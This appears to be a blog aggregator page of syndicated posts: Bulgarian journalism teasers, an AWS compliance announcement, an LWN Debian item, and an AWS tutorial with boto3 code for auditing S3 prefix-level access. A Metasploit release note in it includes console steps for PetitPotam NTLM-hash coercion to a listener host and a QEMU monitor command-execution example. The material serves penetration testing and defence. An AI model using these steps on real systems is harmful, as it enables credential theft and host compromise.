The pigsty will fall!

Post Syndicated from original https://bivol.bg/%D0%BA%D0%BE%D1%87%D0%B8%D0%BD%D0%B0%D1%82%D0%B0-%D0%BA%D0%B5-%D0%BF%D0%B0%D0%B4%D0%BD%D0%B5.html

Monday, 14 February 2022


The system had been running like a well-oiled machine for a long time. For so long that it had turned into timelessness. We all saw that things were not right; some of us even had…

OCCRP investigation with the participation of “Биволъ” #OpenLux: A €25 million villa for the sons of a Russian oligarch stripped of his golden passport in Bulgaria

Post Syndicated from Екип на Биволъ original https://bivol.bg/openlux-%D0%B2%D0%B8%D0%BB%D0%B0-%D0%B7%D0%B0-e25-%D0%BC%D0%BB%D0%BD-%D0%B7%D0%B0-%D1%81%D0%B8%D0%BD%D0%BE%D0%B2%D0%B5-%D0%BD%D0%B0-%D1%80%D1%83%D1%81%D0%BA%D0%B8-%D0%BE%D0%BB%D0%B8%D0%B3%D0%B0.html

Sunday, 13 February 2022


While the opposition and the ruling majority in the National Assembly of the Republic of Bulgaria search for those responsible for the country's large-scale golden-passport scandals, the investigative journalism site “Биволъ” continues its work. After…

Friday Squid Blogging: Climate Change Causing “Squid Bloom” along Pacific Coast

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2022/02/friday-squid-blogging-climate-change-causing-squid-bloom-along-pacific-coast.html

The oceans are warmer, which means more squid.

As usual, you can also use this squid post to talk about the security stories in the news that I haven’t covered.

Read my blog posting guidelines here.

Metasploit Wrap-Up

Post Syndicated from Christophe De La Fuente original https://blog.rapid7.com/2022/02/11/metasploit-wrap-up-148/

Welcome, Little Hippo: PetitPotam

Our very own @zeroSteiner ported the PetitPotam exploit to Metasploit this week. This module leverages CVE-2021-36942, a vulnerability in the Windows Encrypting File System (EFS) API, to capture machine NTLM hashes. It uses the EfsRpcOpenFileRaw function of Microsoft’s Encrypting File System Remote Protocol (MS-EFSRPC) to coerce machine authentication to a user-controlled listener host; Metasploit’s SMB capture server module can serve as that listener. The captured hashes are typically used as part of an NTLM relay attack to take over other Windows hosts. Note that Microsoft has published guidance about how to mitigate NTLM relay attacks.
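
As a rough console sketch of that workflow (the petitpotam module path and its LISTENER option name are best-guess assumptions here, not taken from the post), you would start the capture server first and then coerce the target into authenticating to it:

    msf6 > use auxiliary/server/capture/smb
    msf6 auxiliary(server/capture/smb) > run -j          # start the NTLM capture listener as a job
    msf6 > use auxiliary/scanner/dcerpc/petitpotam
    msf6 auxiliary(scanner/dcerpc/petitpotam) > set RHOSTS 192.0.2.10    # target Windows host
    msf6 auxiliary(scanner/dcerpc/petitpotam) > set LISTENER 192.0.2.99  # host running the capture server
    msf6 auxiliary(scanner/dcerpc/petitpotam) > run

Machine-account passwords are long and random, so hashes captured this way are rarely crackable; that is why they are usually relayed rather than cracked.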

QEMU Human Monitor Interface RCE

Contributor @bcoles added an exploit module that abuses QEMU’s Human Monitor Interface (HMP) TCP server to execute arbitrary commands via the migrate HMP command. Furthermore, since the HMP TCP service is reachable from emulated devices, this module can be used to escape QEMU from a guest system. Note that it doesn’t work on Windows hosts, since the migrate command cannot spawn processes on that platform.
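
For illustration only (the address, port, and command are hypothetical; an exposed monitor would have been started with something like -monitor tcp:0.0.0.0:55555,server,nowait), abusing the exec migration transport looks roughly like this:

    $ nc 192.0.2.5 55555
    QEMU 6.2.0 monitor - type 'help' for more information
    (qemu) migrate "exec:id > /tmp/hmp-rce"

The exec: transport hands its argument to /bin/sh on the host, which is also why there is no Windows equivalent.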

New module content (2)

  • PetitPotam by GILLES Lionel and Spencer McIntyre, which exploits CVE-2021-36942 – This adds a new auxiliary scanner module that ports the PetitPotam tool to Metasploit and leverages CVE-2021-36942 to coerce Windows hosts to authenticate to a user-specified host, which enables an attacker to capture NTLM credentials for further actions, such as relay attacks.
  • QEMU Monitor HMP ‘migrate’ Command Execution by bcoles – This adds a module that can exploit the QEMU HMP service to execute OS commands. The HMP TCP service is reachable from emulated devices, so it is possible to escape QEMU by exploiting this vulnerability.

Enhancements and features

  • #16010 from lap1nou – This updates the zabbix_script_exec module with support for Zabbix version 5.0 and later. It also adds a new item-based execution technique and support for delivering Linux native payloads.
  • #16163 from zeroSteiner – Support has been added for the ClaimsPrincipal .NET deserialization gadget chain, which was found by jang. An exploit which utilizes this enhancement will arrive shortly.
  • #16125 from bcoles – This module can exploit GXV3140 models now that an ARCH_CMD target has been added.

Bugs fixed

  • #16121 from timwr – This fixes an exception caused by exploits that call rhost() in Msf::Post::Common without a valid session.
  • #16142 from timwr – This fixes an issue where Meterpreter’s getenv command did not return NULL when querying a non-existent environment variable.
  • #16143 from sjanusz-r7 – This fixes an issue where a Cygwin SSH session was not correctly identified as a Windows device due to a case-sensitivity issue.
  • #16147 from zeroSteiner – This fixes a bug where ssh_enumusers would only use one source in the generation of its user word list if both USERNAME and USER_FILE options were set. The module now pulls from all possible datastore options if they are set, including a new option DB_ALL_USERS.
  • #16160 from zeroSteiner – This fixes a crash when msfconsole is unable to correctly determine the hostname and current user within a shell prompt.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate,
and you can get more details on the changes since the last blog post on
GitHub.

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
binary installers (which also include the commercial edition).
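
For example (standard commands; the repository URL is the public Metasploit GitHub repo):

    msfupdate                                                       # update an existing installation
    git clone https://github.com/rapid7/metasploit-framework.git    # or track the master branch directly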

C5 Type 2 attestation report now available with 141 services in scope

Post Syndicated from Mercy Kanengoni original https://aws.amazon.com/blogs/security/c5-type-2-attestation-report-now-available-with-141-services-in-scope/

Amazon Web Services (AWS) is pleased to announce the issuance of the new Cloud Computing Compliance Controls Catalogue (C5) Type 2 attestation report. We added 18 additional services and service features to the scope of the 2021 report.

Germany’s national cybersecurity authority, Bundesamt für Sicherheit in der Informationstechnik (BSI), established C5 to define a reference standard for German cloud security requirements. The C5 Type 2 report covers the time period from October 1, 2020, through September 30, 2021. It was issued by an independent third-party attestation organization, and assesses the design and operational effectiveness of AWS’s controls against the basic and additional criteria of the new C5:2020 version.

Customers in Germany and other European countries can use AWS’s attestation report to confirm that AWS meets the security requirements of the C5:2020 framework, and to review the details of the tested controls. This attestation demonstrates our commitment to meet and exceed the security expectations for cloud service providers set by the BSI.

AWS has added 18 services and service features to the new C5 scope.

You can see a current list of the services in scope for C5 on the AWS Services in Scope by Compliance Program page.

AWS strives to continuously bring services into scope of its compliance programs to help you meet your architectural and regulatory needs. Please reach out to your AWS account team if you have questions or feedback about the C5 report.

The C5 report and Continuing Operations Letter are available to AWS customers through AWS Artifact. For more information, see Cloud Computing Compliance Controls Catalogue (C5).

 

Mercy Kanengoni

Mercy is a Security Audit Program Manager at AWS based in Manchester, UK. She leads security audits across Europe, and she has previously worked in security assurance and technology risk management.

Karthik Amrutesh

Karthik is a Senior Manager, Security Assurance at AWS based in New York, U.S. His team is responsible for audits, attestations, certifications, and assessments globally. Karthik has worked in risk management, security assurance, and technology audits for the past 18 years.

[$] Debian reconsiders NEW review

Post Syndicated from original https://lwn.net/Articles/884301/

The Debian project is known for its commitment to free software, the effort
that it puts into ensuring that its distribution is compliant with the
licenses of the software it ships, and the energy it
puts into discussions around that work. A recent (and ongoing) discussion
started with
a query about a relatively obscure aspect of the process by which new
packages enter the distribution, but ended up questioning the project’s
approach toward licensing and copyright issues. While no real conclusions
were reached, it seems likely that the themes heard in this discussion,
which relate to Debian’s role in the free-software community in general, will
play a prominent part in future debates.

How to Audit and Report S3 Prefix Level Access Using S3 Access Analyzer

Post Syndicated from Somdeb Bhattacharjee original https://aws.amazon.com/blogs/architecture/how-to-audit-and-report-s3-prefix-level-access-using-s3-access-analyzer/

Data services teams in all industries are developing centralized data platforms that provide shared access to datasets across multiple business units and teams within the organization. This makes data governance easier, minimizes data redundancy (thus reducing cost), and improves data integrity. The central data platform is often built on Amazon Simple Storage Service (Amazon S3).

A common pattern for providing access to this data is to set up cross-account IAM users and IAM roles that allow direct access to the datasets stored in S3 buckets. You then enforce the permissions on these datasets with S3 bucket policies or S3 access point policies. These policies can be very granular, and you can provide access at the bucket level, the prefix level, or the object level within an S3 bucket.
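
As a minimal sketch (the account ID and role name below are placeholders; the bucket and prefix names follow the vendor layout shown in the next section), a bucket policy granting one cross-account role read access to a single prefix could be applied like this:

    import json
    import boto3

    s3 = boto3.client("s3")

    # Hypothetical policy: allow a role in account 111122223333 to read
    # only objects under vendorA-prefix/ in the vendor bucket.
    policy = {
        "Version": "2012-10-17",
        "Statement": [
            {
                "Sid": "VendorAPrefixRead",
                "Effect": "Allow",
                "Principal": {"AWS": "arn:aws:iam::111122223333:role/vendorA-subscriber"},
                "Action": "s3:GetObject",
                "Resource": "arn:aws:s3:::vendor-s3-bucket/vendorA-prefix/*",
            }
        ],
    }

    s3.put_bucket_policy(Bucket="vendor-s3-bucket", Policy=json.dumps(policy))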

To reduce risk and unintended access, you can use Access Analyzer for S3 to identify S3 buckets within your zone of trust (Account or Organization) that are shared with external identities. Access Analyzer for S3 provides a lot of useful information at the bucket level but you often need S3 audit capability one layer down, at the S3 prefix level, since you are most likely going to organize your data using S3 prefixes.

Common use cases

Many organizations need to ingest a lot of third-party/vendor datasets and then distribute these datasets within the organization in a subscription-based model. Irrespective of how the data is ingested, whether through the AWS Transfer Family service or other mechanisms, all the ingested datasets are stored in a single S3 bucket, with a separate prefix for each vendor dataset. The hierarchy can be represented as:

vendor-s3-bucket
       ->vendorA-prefix
               ->vendorA.dataset.csv
       ->vendorB-prefix
               ->vendorB.dataset.csv

Based on this design, access is also granted to the data subscribers at the S3 prefix level. Access Analyzer for S3 does not provide visibility at the S3 prefix level, so you need to develop custom scripts to extract this information from the S3 policy documents. You also need the information in an easy-to-consume format, for example a csv file, that can be queried, filtered, readily downloaded, and shared across the organization.

To help address this requirement, we show how to implement a solution that builds on the S3 access analyzer findings to generate a csv file on a pre-configured frequency. This solution provides details about:

  • External Principals outside your trust zone that have access to your S3 buckets
  • Permissions granted to these external principals (read, write)
  • The list of S3 prefixes these external principals have access to, as configured in the S3 bucket policy and/or S3 access point policies.

Architecture Overview

Figure 1 – How to Audit and Report S3 prefix level access using S3 Access Analyzer

The solution entails the following steps:

Step 1 – The Access Analyzer ARN and the S3 bucket parameters are passed to an AWS Lambda function via environment variables.

Step 2 – The Lambda code uses the Access Analyzer ARN to call the list-findings API, retrieves the findings information, and stores it in the S3 bucket (under the json prefix) in JSON format.
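
A minimal boto3 sketch of Step 2 (the function and key names are illustrative; the post does not include the Lambda's actual code):

    import json
    import boto3

    analyzer = boto3.client("accessanalyzer")
    s3 = boto3.client("s3")

    def fetch_findings(analyzer_arn, bucket):
        """Page through Access Analyzer findings and store them as JSON in S3."""
        findings, token = [], None
        while True:
            kwargs = {"analyzerArn": analyzer_arn}
            if token:
                kwargs["nextToken"] = token
            resp = analyzer.list_findings(**kwargs)
            findings.extend(resp["findings"])
            token = resp.get("nextToken")
            if not token:
                break
        s3.put_object(
            Bucket=bucket,
            Key="json/findings.json",
            Body=json.dumps(findings, default=str),  # findings include datetime fields
        )
        return findings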

Step 3 – The Lambda function then parses the JSON file to extract the required fields and stores them as a csv file in the same S3 bucket (under the report prefix). It also scans the bucket policy and/or the access point policies to retrieve the S3 prefix-level permissions granted to the external identity, and adds that information to the csv file.
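
The prefix extraction in Step 3 could be sketched as follows, as a simplification that assumes the prefixes appear in the bucket policy's Resource ARNs (access point policies would be walked the same way):

    import json
    import boto3
    from botocore.exceptions import ClientError

    s3 = boto3.client("s3")

    def prefixes_from_bucket_policy(bucket):
        """Return the object-level prefixes referenced by a bucket's policy."""
        try:
            doc = json.loads(s3.get_bucket_policy(Bucket=bucket)["Policy"])
        except ClientError:
            return []  # bucket has no policy attached
        prefixes = []
        for stmt in doc.get("Statement", []):
            resources = stmt.get("Resource", [])
            if isinstance(resources, str):
                resources = [resources]
            for arn in resources:
                if "/" in arn:  # arn:aws:s3:::bucket/prefix/* is object-level
                    prefixes.append(arn.split(":::", 1)[1].split("/", 1)[1])
        return prefixes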

Steps 4 and 5 – As part of the initial deployment, an AWS Glue crawler is provided to discover and create the schema of the csv file and store it in the AWS Glue Data Catalog.

Step 6 – An Amazon Athena query is run to create a spreadsheet of the findings that can be downloaded and distributed for audit.
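
Step 6 can also be run programmatically. A sketch using boto3 (the database and table names match the ones used later in this walkthrough; the output location is a placeholder):

    import boto3

    athena = boto3.client("athena")

    query = (
        'SELECT * FROM "analyzer-report" '        # hyphenated names need double quotes in Athena
        "WHERE externalaccount = '111122223333'"  # placeholder external account
    )
    resp = athena.start_query_execution(
        QueryString=query,
        QueryExecutionContext={"Database": "analyzerdb"},
        ResultConfiguration={"OutputLocation": "s3://analyzer-findings-example/athena/"},
    )
    print(resp["QueryExecutionId"])  # poll get_query_execution() until the state is SUCCEEDED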

Prerequisites

For this walkthrough, you should have the following prerequisites:

  • An AWS account
  • S3 buckets that are shared with external identities via cross-account IAM roles or IAM users. Follow the instructions in this user guide to set up cross-account S3 bucket access.
  • IAM Access Analyzer enabled for your AWS account. Follow these instructions to enable IAM Access Analyzer within your account.

Once the IAM Access Analyzer is enabled, you should be able to view the Analyzer findings from the S3 console by selecting the bucket name and clicking on the ‘View findings’ box or directly going to the Access Analyzer findings on the IAM console.

When you select a ‘Finding id’ for an S3 Bucket, a screen similar to the following will appear:

Figure 2 – IAM Console Screenshot

Setup

Now that your access analyzer is running, you can open the link below to deploy the CloudFormation template. Make sure to launch the CloudFormation in the same AWS Region where IAM Access Analyzer has been enabled.

Launch template

Specify a name for the stack and input the following parameters:

  • ARN of the Access Analyzer, which you can find in the IAM Console.
  • New S3 bucket where your findings will be stored. The CloudFormation template will add a suffix to the bucket name you provide to ensure uniqueness.

Figure 3 – CloudFormation Template screenshot

  • Select Next twice and on the final screen check the box allowing CloudFormation to create the IAM resources before selecting Create Stack.
  • It will take a couple of minutes for the stack to create the resources and launch the AWS Lambda function.
  • Once the stack is in CREATE_COMPLETE status, go to the Outputs tab of the stack and note down the value against the DataS3BucketName key. This is the S3 bucket the template generated. It would be of the format analyzer-findings-xxxxxxxxxxxx. Go to the S3 console and view the contents of the bucket.
    There should be two folders archive/ and report/. In the report folder you should have the csv file containing the findings report.
  • You can download the csv directly and open it in an Excel sheet to view the contents. If you would like to query the csv based on different attributes, follow the next set of steps.
    Go to the AWS Glue console and click on Crawlers. There should be an analyzer-crawler created for you. Select the crawler to run it.
  • After the crawler runs successfully, you should see a new table, analyzer-report created under analyzerdb Glue database.
  • Select the table name to view the table properties and schema.
  • To query the table, go to the Athena console and select the analyzerdb database. Then you can run a query like SELECT * FROM "analyzer-report" WHERE externalaccount = '<<valid external account>>' (the hyphenated table name must be double-quoted in Athena) to list all the S3 buckets the external account has access to.

Figure 4 – Amazon Athena Console screenshot

The output of the query with a subset of columns is shown as follows:

Figure 5 – Output of Amazon Athena Query

This CloudFormation template also creates a CloudWatch Events rule, testanalyzer-ScheduledRule-xxxxxxx, that launches the Lambda function every Monday to generate a new version of the findings csv file. You can update the rule to set it to whatever frequency you desire.
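
For example, switching the report from weekly to daily could look like this (a sketch; look up the exact rule name in your account first, since the stack output abbreviates it):

    import boto3

    events = boto3.client("events")

    # put_rule creates or updates a rule; cron(...) expressions are also accepted.
    events.put_rule(
        Name="testanalyzer-ScheduledRule-xxxxxxx",  # replace with the rule name from your stack
        ScheduleExpression="rate(1 day)",
    )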

Clean Up

To avoid incurring costs, remember to delete the resources you created. First, manually delete the folders ‘archive’ and ‘report’ in the S3 bucket and then delete the CloudFormation stack you deployed at the beginning of the setup.

Conclusion

In this blog, we showed how you can build audit capabilities for external principals accessing your S3 buckets at a prefix level. Organizations looking to provide shared access to datasets across multiple business units will find this solution helpful in improving their security posture. Give this solution a try and share your feedback!
